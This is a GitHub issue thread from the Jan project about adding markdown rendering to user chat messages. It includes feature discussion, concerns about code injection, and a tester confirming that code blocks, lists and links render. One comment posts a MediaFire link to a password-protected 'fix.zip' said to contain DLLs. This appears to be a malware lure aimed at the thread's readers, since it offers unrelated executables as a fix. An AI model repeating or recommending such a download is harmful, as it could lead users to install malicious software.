### ISSUE TITLE
idea: Add markdown rendering support to Jan

### ISSUE THREAD

**Issue by imtuyethan** [janhq/jan#3739]
### Problem Statement
https://github.com/janhq/jan/issues/3358
https://discord.com/channels/1107178041848909847/1288971144837206036
Currently, Jan does not render markdown correctly in user messages to the LLM. This limits the ability of users to format their input in a clear and structured way, which can be particularly important for code snippets, lists, and other structured text. The lack of markdown support affects the readability and usability of the chat interface, especially for technical discussions or when sharing code.

### Feature Idea

Implement markdown rendering support in Jan's chat interface. This would include:

1. Rendering markdown in user input messages:
   - Code blocks with syntax highlighting
   - Inline code formatting
   - Headers
   - Lists (ordered and unordered)
   - Bold and italic text
   - Links
   - Blockquotes

2. Ensure markdown rendering works consistently across different models (e.g., Claude 3.5 Sonnet, as mentioned in the conversation).

3. Include a toggle option to view raw markdown text alongside the rendered version?

**Comment by SagarChandra07** [comment]
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme
I put the necessary dlls in the archive

**Comment by imtuyethan** [comment]
Personally it's kinda hard to have this feature because everyone has their own preferences. Maybe  * * Hi * * (means bold Hi for you) but * * Hi * * could be just  * * Hi * * for other users if that is there intention, tweaking the input may not be a universal solution. Everyone feels free to debate your ideas <3

**Comment by imtuyethan** [comment]
Related: https://github.com/janhq/jan/issues/3358

**Comment by imtuyethan** [comment]
![Screenshot 2024-09-29 at 9 49 23 AM](https://github.com/user-attachments/assets/ea67e874-cce8-4df9-b1e8-fd8a83e55512)

**Comment by baraich** [comment]
@imtuyethan Please assign the issue to me. Though I have started to work so that when I get assigned, I have something to share. Thanks

**Comment by imtuyethan** [comment]
We will support this, but it will be under `Advanced Settings` or `Appearance` settings, as previously we have received some reports about how some people tried to do some code injection & which could break the app. 

Related issue: https://github.com/janhq/jan/issues/3358

**Comment by 0xSage** [comment]
> * e blocks with syntax highlighting
> * Inline code formatting
> * Headers
> * Lists (ordered and unordered)
> * Bold and italic text
> * Links
> * Blockquotes
> *

@imtuyethan This is not a settings feature. Let's stop shoving things into settings, when they should just be handled by default.

I'd like @urmauur to investigate this issue more and figure out how we can do this in a secure way. If the solution involves injection vulnerabilities, then it was never the correct solution.

**Comment by imtuyethan** [comment]
Tested 0.5.6-665 with 
- [x] Code blocks with syntax highlighting
- [x] Lists (ordered and unordered)
- [x] Bold and italic text
- [x] Links
- [x] Blockquotes
<img width="769" alt="Screenshot 2024-10-22 at 3 21 57 PM" src="https://github.com/user-attachments/assets/52506498-7381-45ee-8900-fd420c1b5ce3">
<img width="783" alt="Screenshot 2024-10-22 at 3 21 52 PM" src="https://github.com/user-attachments/assets/d724656a-e162-4baa-9281-92f5620503c0">

It works well on my end:
<img width="806" alt="Screenshot 2024-10-22 at 3 22 05 PM" src="https://github.com/user-attachments/assets/842f6950-fe24-49ce-bcc5-9a46090b3f5e">
